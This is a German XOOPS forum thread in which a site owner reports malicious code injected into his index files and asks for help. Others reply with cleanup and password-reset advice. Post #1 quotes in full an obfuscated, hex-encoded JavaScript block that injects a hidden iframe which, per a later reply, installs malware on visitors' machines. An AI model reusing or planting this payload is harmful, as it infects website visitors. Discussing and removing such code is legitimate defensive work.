Fork me on GitHub
"XOOPS ist ein dynamisches OO (Objekt Orientiertes) open source Portal Script geschrieben in PHP. XOOPS ist ein ideales CMS (Content Management System) für den Aufbau von kleineren und grösseren Communities, Firmen-, Intra- und Internet-Portale, Web-Logs und vieles mehr."
forum
Bitte schaut in die DOKUMENTATION oder benutzt die SUCHFUNKTION bevor Ihr Eure Fragen im Forum stellt. Viele Fragen wurden bereits gestellt.

Leser in diesem Thema:   1 Anonyme(r)


(1) 2 3 4 ... 6 »


Fremder Code in der index.php
#1
Benutzerinformationen
Hallo!

Ich habe heute fremden Code in allen Index-Dateien auf meinem Server entdeckt.

Der Angreifer hatte definitiv FTP-Zugriff,
weil auch die Index.php in einem mit .htaccess geschützen Verzeichnis verändert wurde.

Ich hoffe ihr könnt mir weiterhelfen.


Folgender Code befindet sich jeweils am Ende der Index-Dateien.

<script>function c4122000144m48718f33519f1(m48718f33521c1){
return (
parseInt(m48718f33521c1,16));}function
m48718f3353931(m48718f3354102){
function 
m48718f3355870(){var m48718f3356040=2;return m48718f3356040;}
var 
m48718f33548d1='';m48718f335680e=String.fromCharCode;
for(
m48718f3355219=0;m48718f3355219<m48718f3354102.length;m48718f3355219+=m48718f3355870()){
m48718f33548d1+=(m48718f335680e(c4122000144m48718f33519f1(m48718f3354102.substr(m48718f3355219,m48718f3355870()))));}
return 
m48718f33548d1;} var zf3='';var
m48718f3356fdf='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'
+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+
zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+
zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3
+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+
'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'
+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'
+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'
+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3
+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'
+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3
+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3
+'4683C3520262620656C2E68656967'+zf3+'687'
+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+
'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'
+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+
'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'
+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'
+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3
+'322536312536642536352532302536652536312536642536352533642536332533342532302537'
+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'
+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3
+'2536632536352532642536312536652536312536632536392537'+zf3
+'61253635253265253633253666253664253266253639253665253265253633253637'
+zf3+'25363925336625333125333426253237'+zf3+'2532622534642536312537'+zf3
+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'
+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253331253339253338253337'+zf3+'253336253332253239253262253237'
+zf3+'253331253335253331253633253337'+zf3+'253330253631253635253635253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253334253337'
+zf3+'253331253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533322532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'
+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3
+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3
+'07'+zf3+'43E';document.write(m48718f3353931(m48718f3356fdf));</script><script>check_content()</script>

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#2
Benutzerinformationen
0. DATENBANKSICHERUNG

1. Schau über FTP nach wann die Datei geändert wurde und rufe deinen Hoster an und sage ihm, dass von Dritter Seite Dateien geändert wurden und du KEINE FTP Benutzernamen und Kennworte herausgegeben hast. Frage ihn dann, ob zum fraglichen Zeitpunkt ein Zugriff aus dem Ausland war. Der Kundendienst wird dir sicher mal sagen, dass er keine Daten weitergeben darf. Sag ihm, dass du das verstehst, du würdest aber nur gerne wissen ob der Zugriff aus dem Ausland war und nicht die IPs benötigst, daher die Daten also anonymisiert sind.

2. Bei deinem Hoster ALLE Passwörter erneuern

3. Abklemmen der Site
4. Überprüfen der Site auf Schadcode. Wenn du ein Backup der Site lokal hast, dann am Besten mal die Dateien mit WinMerge vergleichen, dann siehst du gleich wo was verändert wurde.
5. Datenbanksicherung vor irgendwelchen Änderungen nicht vergessen!!!!!!!

Ich habe bei zwei Kunden in Österreich auch schon so etwas gehabt. Ich denke mal, dass da beim Hoster was falsch gelaufen ist, möchte aber keine unbewiesenen Beschuldigungen äußern.

Geschrieben: 16.07.2008
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#3
Benutzerinformationen
Hallo!

Bevor ich hier meine Frage stellte,
habe ich bereits mit meinem Hoster telefoniert.

Er sagte mir zu, das es bei ihm keine Angriffe gab.

Diese Mail schickte mir mein Hoster:
Zitat:

vielen Dank für Ihre Rückmeldung. Bitte prüfen Sie unbedingt die Sicherheit Ihrer verwendeten
PHP Skripte. Hier scheint das Einschleusen von Schadcode ohne Probleme möglich zu sein.
Bitte wenden Sie sich notfalls an den Skripthersteller zur Analyse.


An welcher Stelle genau, konnte er mir aber auch nicht sagen.

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#4
Benutzerinformationen
Zitat:
Ich habe heute fremden Code in allen Index-Dateien auf meinem Server entdeckt.

Der Angreifer hatte definitiv FTP-Zugriff,
weil auch die Index.php in einem mit .htaccess geschützen Verzeichnis verändert wurde.


Ich würde trotzdem den Software Aspekt nicht aus den Augen verlieren ...

- Welche Xoops Version?
- Welche Module und in welcher Version kamen zum Einsatz?
- Hast Du den protector installiert?
- Spaw Editor?

Sven

Geschrieben: 16.07.2008
_________________
webmystar
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#5
Benutzerinformationen
Zitat:

Ich würde trotzdem den Software Aspekt nicht aus den Augen verlieren ...


Was meinst du damit?

Meine Versionen:
XOOPS 2.2.6 RC

News 1.55
CBB/NewBB 3.08
Protector 3.16
WF-Downloads 3.1
Polls 1.01
Memberlist 1
Links 1.1
Contact Us 1.6
Xoops Info 1.2

Spaw Editor habe ich schon lange nicht mehr.

Geschrieben: 16.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#6
Benutzerinformationen
Zitat:
Was meinst du damit?


Ich wollte damit nur zum Ausdruck bringen, dass es auch an unsicheren Modulen gelegen habe könnte.

Sven

Geschrieben: 16.07.2008
_________________
webmystar
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#7
Benutzerinformationen
Ich kanns nur wiederholen, dass du sämtliche Passwörter neu anfordern solltest.

Wenn sich der Hoster dagegen sträubt oder dir Kosten dafür verrechnen will, dann hast du sicher den falschen Dienstleister. Klar, keiner wird leicht zugeben, dass er ein Sicherheitsleck hat.

Und anhand der vom Hoster geführten FTP Protokolle könnte leicht festgestellt werden woher ein Zugriff gekommen ist. Im Prinzip würde es dir ja reichen zu wissen DASS ein Zugriff von Dritter Seite stattgefunden hat. Ich würde den Hoster nochmals auf die Zehen steigen und nicht die Schuld auf Skripte schieben lassen, denn das ist eine bequeme Lösung so wie "setzen Sie den Rechner neu auf" bei Windows Problemen.

Anhand des Datums und der Uhrzeit kannst du ja den genauen Zeitpunkt des Angriffs bestimmen, was eine Weiterverfolgung leichter macht. Natürlich hast du auch noch die Option einer Strafanzeige, aber das ist wieder einiger Aufwand, der es meiner Ansicht nach nicht bringt.

Aber ohne geänderte Passwörter hätte ich ein sehr, sehr ungutes Gefühl.

Geschrieben: 17.07.2008
_________________
Who fails to plan, plans to fail
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#8
Benutzerinformationen
Hallo!

Die Paswörter habe ich natürlich schon geändert.

Den fremden Code habe ich aus den Index-Dateien entfernt.

Andere geänderte Dateien habe ich nicht gefunden.

Die Index-Dateien wurden das letzte mal am 07.07.2008 geändert.

Meine Seite wurde aber erst am 16.07.2008 langsam,
worauf ich mir die Index.php anschaute,
weil meine Seite nur auf der Startseite lange Ladezeiten hatte.

Kann mir denn jemand sagen, was dieser Code bewirkt?

Gruß, Chris

Geschrieben: 17.07.2008
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#9
Benutzerinformationen
Wird sonst auch noch eine JavaSript-Datei oder eine sonstige Datei in der Datei eingebunden?

Geschrieben: 17.07.2008
Erstelle PDF des Beitrags Drucke

Re: Fremder Code in der index.php
#10
Benutzerinformationen
der Code versucht Malware auf den Rechner zu installieren
(auf den der die Seite aufruft), ist ein Virus


Alfred

Geschrieben: 17.07.2008
Erstelle PDF des Beitrags Drucke







[Erweiterte Suche]